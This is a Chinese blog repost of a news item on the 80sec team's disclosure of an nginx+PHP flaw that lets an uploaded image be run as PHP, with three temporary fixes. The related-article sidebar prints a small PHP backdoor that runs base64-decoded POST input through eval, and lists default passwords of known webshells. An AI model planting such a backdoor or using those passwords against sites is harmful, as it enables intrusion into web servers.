国内安全团队80sec发现nginx重大漏洞

最新推荐文章于 2025-04-08 20:01:31 发布
转载 最新推荐文章于 2025-04-08 20:01:31 发布 · 2.4k 阅读 · 1
文章标签:

#nginx #服务器 #php #firefox #公告 #互联网

国内安全团队80sec发现nginx存在漏洞,使用nginx+php的站点若允许上传图片,可能会遭到黑客攻击。此漏洞允许黑客通过上传特制图片植入木马。目前官方尚未发布修复补丁。

国内安全团队80sec于5.20日下午6点发布了一个关于nginx的漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允 许上传图片就可能被黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁。

由于nginx有漏洞,这100万台服务器可能通过上传图片的方法被黑客轻易的植入木马。植入木马的过程也非常简单,就是把木马改成图片上传。具体细节:

http://www.80sec.com/nginx-securit.html

80sec团队由一群年轻、充满活力、充满体力、充满激情、富有创造力的未婚dota男组成,他们均在各大互联网公司从事信息安全工作,他们的口号是 know it then hack it。

80sec的意思是“80端口的安全”,也就是“web安全”;同时由于该团队成员都是80后的年轻人,也可以理解为“80后安全”。该团体自称对 80sec的理解仅受限于想象力。他们曾发现IIS、IE、FireFox、Maxthon、世界之窗、PHPWind、DeDeCMS、QQ mail、QuarkMail、EXTMail等软件的漏洞。

根据80sec安全公告的描述,临时修复方法如下,可3选其一:

1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评估。

2、给nginx的vhost配置添加如下内容,重启nginx。vhost较少的情况下也很方便。

if ( $fastcgi_script_name ~ ..*/.*php ) {

return 403;

}

3、禁止上传目录解释PHP程序。不需要动webserver,如果vhost和服务器较多,短期内难度急剧上升;建议在vhost和服务器较少的情况下 采用。

renziming
关注
Kubernetes 安全全景解析:2024-2025 关键漏洞与最佳实践落地指南
探索云原生与智能化驱动下的安全运维新范式。关注DevSecOps、可观测性、AIOps等前沿领域,与您共赴技术前沿。
11-15 200
随着云原生技术采用率达到89%,Kubernetes 已成为现代应用的核心编排平台,但其安全性正面临前所未有的挑战。过去五年中,Kubernetes 漏洞数量激增440%,安全态势日趋严峻。当前威胁态势93%的组织在过去一年中遭遇了至少一次 Kubernetes 安全事件,其中46%的组织因此遭受了收入或客户损失。攻击者的自动化程度不断提高,新创建的 AKS 集群在18 分钟内就会遭遇首次攻击尝试,EKS 集群也仅需28 分钟。
安全见闻笔记
weixin_74811095的博客
10-27 1625
本文全面探讨了网络安全的多个关键领域,包括渗透测试概念与实践、编程语言的选择、软件程序的安全性、网络基础、通讯协议的安全问题、硬件设备的网络安全、人工智能在网络安全中的应用、量子计算对网络安全的影响、二进制与网络安全的关系,以及网络安全热门证书的介绍和备考指南。文章强调了在不断演变的网络威胁面前,持续学习、实践和适应的重要性,以及通过专业认证提升个人技能的必要性。同时,文章也提醒读者在追求技术进步的同时,应保持谦逊和对知识无限性的认识,以促进个人成长和知识边界的扩展。
各大组织大马默认密码
weixin_34414196的博客
11-09 1732
黑羽基地免杀asp大马 密码5201314  Asp站长助手6.0 密码584521  web综合安全评测 - Beta3 密码nohack  未知数X 密码45189946  baidu}" 密码baidu  路遥知马力 密码123  黑客网站之家 美化版 密码chenxue  Thé、End.゛ 密码and QQ:913720787  笑佛天下 密码cnot  西域小刚-站长助手-修改版本 密...
nginx 漏洞
亿光年
05-27 1824
      最近忙,很久都没来写博客了,nginx爆文件类型漏洞,我是直接受害者,5月20号提出的,我24号直到受害才知道。对这方面的关注与敏感度不够!大家可能对这个漏洞都是很熟悉了的。但我还是详细的说明一下的。nginx默认以cgi的方式支持php的运行,譬如在配置文件当中可以以location ~ /.php$ {root html;fastcgi_pass 127.0.0.1:900
welcome to Nginx!!
Internation985的博客
05-27 2388
ss
nginx漏洞利用
cnbird's blog
11-20 1793
http://habrahabr.ru/post/202796/?utm_source=twitterfeed&utm_medium=twitter
80发现nginx 0day漏洞百万服务器受威胁
weixin_34007879的博客
05-26 302
 国内顶级安全团队80sec于5.20日下午6点发布了一个关于nginx漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允许上传图片就可能被******,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复!  没错,重申一次,由于nginx漏洞,这100万台服务器可能通过上传图片的方法被***轻易的植入***。...
80sec里面的小马
Yatere的天平秤
02-07 1020
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); 黑客果然是为了ev
系统安全加固:Ubuntu服务安全管理的12项最佳实践
[系统安全加固:Ubuntu服务安全管理的12项最佳实践](https://opengraph.githubassets.com/372b4bd2b229671a75ecf166ef5dfbfa28f1173c49712527b8d688d79e664428/dev-sec/ansible-ssh-hardening) # 1. Ubuntu服务安全...
OTA远程升级从入门到精通:ESP32固件安全更新的完整实施方案
![OTA远程升级从入门到精通:ESP32固件安全更新的完整实施方案]...在物联网大规模部署的背景下,OTA成为保障系统安全、修复漏洞和迭代功能的核心手段。ESP32作为主流的Wi-
浅谈绕过WAF的数种方法.txt
07-18
浅谈绕过WAF的数种方法.txt
OTA远程升级实战:安全可靠更新现场设备固件的6步标准流程
随着物联网设备规模的爆发式增长,**OTA(Over-the-Air)远程升级**已成为保障设备生命周期管理、修复漏洞和持续迭代功能的关键技术。它通过无线通信方式实现固件(Firmware)的远程更新,广泛应用于智能汽车、工业...
[80Sec]深掘XSS漏洞场景之XSS Rootkit
weixin_30518397的博客
10-17 167
80SEC的牛。 转载开始。 深掘XSS漏洞场景之XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-10-15 0×00 前言 众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久...
Nginx 文件解析漏洞的复现
qq_42754807的博客
05-28 925
nginx文件解析漏洞的修复
Nginx漏洞复现
最新发布
ALe0721的博客
04-08 424
vulhub起靶场。
nginx常见漏洞解析
热门推荐
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
nginx常见漏洞解析_nginx漏洞(2),2024年最新【一篇文章搞懂
2401_84181340的博客
04-10 4382
中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。但是在开发使用过程中也不乏官方程序自身的一些安全问题。我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关。
浅谈Ddos******与防御
weixin_33790053的博客
02-13 219
From: http://www.80sec.com/ [ 目录 ] 一 背景 二 应急响应 三 常见ddos***及防御 四 根源及反击 五 总结 一 背景 在前几天,我们运营的某网站遭受了一次ddos***,我们的网站是一个公益性质的网站,为各个厂商和白帽子之间搭建一个平台以传递安全问题等信息,我们并不清楚因为什么原因会遭遇这种无耻的***。因为我们本身...
nginx常见漏洞解析_nginx漏洞,你有过迷茫吗
2301_76225520的博客
04-03 2432
3.查看效果,确实可以有效消除CRLF的影响。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值